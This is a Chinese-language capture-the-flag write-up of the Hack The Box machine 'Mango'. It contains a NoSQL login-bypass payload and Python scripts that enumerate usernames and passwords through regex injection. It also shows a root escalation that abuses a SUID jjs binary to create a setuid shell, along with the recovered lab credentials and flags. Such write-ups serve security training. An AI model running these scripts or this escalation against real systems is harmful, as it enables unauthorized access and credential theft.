Mango-htb-writeup

0x00 靶场技能介绍

章节技能：NoSQL数据库登录绕过、NoSQL注入、NoSQL用户名和密码枚举、suid提权、jjs提权

参考链接：https://fdlucifer.github.io/2020/04/20/mango/

参考链接：https://0xdf.gitlab.io/2020/04/18/htb-mango.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.162

2、扫描下开放端口情况：

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport 10.10.10.162     
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:35 CST
Warning: 10.10.10.162 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.162
Host is up (1.1s latency).
Not shown: 63824 closed tcp ports (reset), 1708 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 39.51 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,443 -Pn --min-rate=10000 10.10.10.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:36 CST
Nmap scan report for 10.10.10.162
Host is up (0.32s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
|_http-title: Mango | Search Base
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.40 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport1 10.10.10.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 20:37 CST
Warning: 10.10.10.162 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.162
Host is up (0.64s latency).
All 65535 scanned ports on 10.10.10.162 are in ignored states.
Not shown: 65455 open|filtered udp ports (no-response), 80 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 87.38 seconds

3、本地绑定下，发现的域名情况

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.162 mango.htb" | sudo tee -a /etc/hosts
10.10.10.162 mango.htb

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.162 staging-order.mango.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.10.162 staging-order.mango.htb

4、分别访问下域名情况

https://mango.htb

https://staging-order.mango.htb

5、通过尝试，发现 staging-order.mango.htb 域名，使用的是一个 NoSQL 数据库的格式，存在SQL注入绕过的问题

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#exploits

username[$ne]=shiyan&password[$ne]=shiyan&login=login

6、这里尝试绕过登录下

POST / HTTP/1.1
Host: staging-order.mango.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://staging-order.mango.htb
Connection: close
Referer: http://staging-order.mango.htb/
Cookie: PHPSESSID=tn04egm4dh8ov0s168f17e229p
Upgrade-Insecure-Requests: 1

username[$ne]=shiyan&password[$ne]=shiyan&login=login

HTTP/1.1 302 Found
Date: Tue, 09 Jan 2024 13:02:58 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: home.php
Content-Length: 4022
Connection: close
Content-Type: text/html; charset=UTF-8

7、跳转到 home.php 目录，且页面上有些提示信息

http://staging-order.mango.htb/home.php

Under Plantation
Sorry for the inconvenience. We just started farming!
To contact us in the meantime please email: admin@mango.htb
We rarely look at our inboxes.

8、这里考察是 NoSQL 注入，获取到目标的用户名和密码的内容，下面的具体枚举的章节内容：

用b.*替换a.*返回200响应，这意味着没有包含b的用户名。编写一个使用此逻辑发现用户名的脚本。

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
def sendPayload():
    for char in lowercase:
        regex = '{}.*'.format(char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            print "Found valid letter: {}".format(char)
def getUser():
    sendPayload()
if __name__ == '__main__':
    getUser()

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum.py
Found valid letter: a
Found valid letter: d
Found valid letter: g
Found valid letter: i
Found valid letter: m
Found valid letter: n
Found valid letter: o

脚本发现了7个有效字符，即a、d、g、i、m、n、o。现在已经减少了字符集，可以尝试显示实际的用户名。regex中的插入符号^用于标记单词的开头。例如，模式^a.*仅当用户名以a开头时才返回true。 类似地，模式^ad.*如果以ad开头的用户名存在，则返回true，以此类推。使用这个逻辑更新脚本。

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']
def sendPayload(word):
    regex = '^{}.*'.format(word)
    data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
    response = post(url, data = data, allow_redirects=False)
    if response.status_code == 302:
        return word
    else:
        return None
def getUser():
    for char in valid:
        if sendPayload(char) != None:
            print "Found username starting with {}".format(char)
if __name__ == '__main__':
    getUser()

脚本循环遍历字符集，查找以这些字母中的任何一个开头的用户名。
运行脚本后出现下面的结果

┌──(kali㉿kali)-[~/桌面]
└─$ touch enum1.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum1.py
Found username starting with a
Found username starting with m

发现DB分别包含以a和m开头的用户名。更新脚本以显示真正的用户名。

from requests import post
from string import lowercase
url = 'http://staging-order.mango.htb/'
valid = ['a', 'd', 'g', 'i', 'm', 'n', 'o']
def sendPayload(word):
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username[$regex]' : regex, 'password[$ne]' : 'password', 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None
def getUser():
    for ch in ['a', 'm']:
        username = ch
        while True:
            char = sendPayload(username)
            if char != None:
                username += char
            else:
                print "Username found: {}".format(username)
                break

if __name__ == '__main__':
    getUser()

┌──(kali㉿kali)-[~/桌面]
└─$ touch enum2.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum2.py
Username found: admin
Username found: mango

脚本循环遍历有效字符并查找以a和m开头的用户名。

包含302状态码(URL重定向)的HTTP响应包含一个有效字符，该脚本输出结果如下。

标识了两个有效的用户名，admin和mango。可以尝试使用相同的逻辑来识别他们的密码。

修改脚本如下所示

from requests import post
from string import printable
url = 'http://staging-order.mango.htb/'
def sendPayload(user):
    valid = []
    for char in printable:
        regex = '{}.*'.format(char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            valid.append(char)
    return valid
def getUser():
    for user in ['admin', 'mango']:
        valid = sendPayload(user)
        print "Valid characters for {}: {}".format(user, valid)
if __name__ == '__main__':
    getUser()

┌──(kali㉿kali)-[~/桌面]
└─$ touch enum3.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum3.py
Valid characters for admin: ['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '$', '.', '>', '\\', '^', '|']
Valid characters for mango: ['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '$', '.', '\\', ']', '^', '{', '|', '~']

以上面使用python脚本fuzz出的信息立足，爆破两个用户的密码
现在已经有了两个密码的字符集，更新脚本来查找密码。字符 ^，$，|，\\和.

应该用反斜杠进行转义，因为它们在正则表达式中具有特殊意义，并且可能导致错误的否定。

依照之前爆破用户名脚本的方法修改脚本如下

from requests import post
from string import printable
url = 'http://staging-order.mango.htb/'
admin_pass = ['0', '2', '3', '9', 'c', 't', 'B', 'K', 'S', '!', '#', '\\$', '\\.', '>', '\\\\', '\\^', '\\|']
mango_pass = ['3', '5', '8', 'f', 'h', 'm', 'H', 'K', 'R', 'U', 'X', '\\$', '\\.', '\\\\', ']', '\\^', '{', '\\|', '~']
def sendPayload(user, word):
    valid = admin_pass if user == 'admin' else mango_pass
    for char in valid:
        regex = '^{}.*'.format(word + char)
        data = { 'username' : user, 'password[$regex]' : regex, 'login' : 'login' }
        response = post(url, data = data, allow_redirects=False)
        if response.status_code == 302:
            return char
    return None
def getUser():
    for user in ['admin', 'mango']:
        password = ''
        while True:
            char = sendPayload(user, password)
            if char != None:
                password += char
            else:
                print "Password for {} found: {}".format(user, password)
                break
if __name__ == '__main__':
    getUser()

┌──(kali㉿kali)-[~/桌面]
└─$ touch enum4.py

┌──(kali㉿kali)-[~/桌面]
└─$ python2 enum4.py
Password for admin found: t9KcS3>!0B#2
Password for mango found: h3mXK8RhU~f{]f5H

9、到这里就枚举出了，我们所需要的账号和密码了

mango

h3mXK8RhU~f{]f5H

10、使用ssh 进行登录

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mango@10.10.10.162                       
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ED25519 key fingerprint is SHA256:tzYGTA/kNsB/kThvsmrv2uxaUS/2zS/grRQkrbN4+RE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.162' (ED25519) to the list of known hosts.
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Jan  9 13:47:24 UTC 2024

  System load:  0.0               Processes:           101
  Usage of /:   57.8% of 5.29GB   Users logged in:     0
  Memory usage: 14%               IP address for eth0: 10.10.10.162
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

118 packages can be updated.
18 updates are security updates.


Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ id
uid=1000(mango) gid=1000(mango) groups=1000(mango)
mango@mango:~$ pwd
/home/mango
mango@mango:~$ ls
mango@mango:~$ 

11、获取到第一个用户的flag信息

mango@mango:~$ ls -la /home
total 16
drwxr-xr-x  4 root  root  4096 Oct 23 13:17 .
drwxr-xr-x 23 root  root  4096 Oct 23 13:17 ..
drwxr-xr-x  2 admin admin 4096 Oct 23 13:18 admin
drwxr-xr-x  4 mango mango 4096 Oct 23 13:17 mango
mango@mango:~$ su admin
Password: t9KcS3>!0B#2
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ pwd
/home/mango
$ cd ~
$ pwd
/home/admin
$ ls
user.txt
$ cat user.txt
0e9d93bd5a3112edae1f27db5e702022
$ 

0x02 系统权限获取

12、使用Python获取下交互式shell

$ 
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/admin$ 
admin@mango:/home/admin$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Oct 23 13:18 .
drwxr-xr-x 4 root  root  4096 Oct 23 13:17 ..
lrwxrwxrwx 1 admin admin    9 Sep 27  2019 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
-r-------- 1 admin admin   33 Jan  9 12:27 user.txt

13、查看下 sudo 信息

admin@mango:/home/admin$ sudo -l
[sudo] password for admin: 
Sorry, user admin may not run sudo on mango.
admin@mango:/home/admin$ su mango
Password: 
mango@mango:/home/admin$ sudo -l
[sudo] password for mango: 
Sorry, user mango may not run sudo on mango.
mango@mango:/home/admin$ 

14、查找下 suid 程序

mango@mango:/home/admin$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
mango@mango:/home/admin$ 

15、发现了一个特殊的程序

/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

mango@mango:/home/admin$ ls -la /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
-rwsr-sr-- 1 root admin 10352 Jul 18  2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

16、通过 gtfobins 获取到提权方法

https://gtfobins.github.io/gtfobins/jjs/

17、切换用户，进行尝试提权

mango@mango:~$ su admin
Password: 
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@mango:/home/mango$ 
admin@mango:/home/mango$ 
admin@mango:/home/mango$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
For()Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').wait 
0
For()Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').wait 
0
jjs> 
jjs> exit
function exit() { [native code] }
jjs> quit
function quit() { [native code] }
jjs> 
admin@mango:/home/mango$ cd /tmp
admin@mango:/tmp$ ls
hsperfdata_root
mongodb-27017.sock
sh
systemd-private-80e8520757ca4ca296157726a81fa8f1-apache2.service-dXww2S
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-resolved.service-7GqmTu
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-timesyncd.service-Zu3sDz
vmware-root_414-592089511
admin@mango:/tmp$ ./sh -p
$ id
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
or() Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitF 
0
jjs> 
$ ls
hsperfdata_root
mongodb-27017.sock
sh
systemd-private-80e8520757ca4ca296157726a81fa8f1-apache2.service-dXww2S
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-resolved.service-7GqmTu
systemd-private-80e8520757ca4ca296157726a81fa8f1-systemd-timesyncd.service-Zu3sDz
vmware-root_414-592089511
$ ./sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)

18、获取下最终的 flag 信息

# cat /root/root.txt
4899beb8bf4411fd8efaecf0b5bf9460
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/214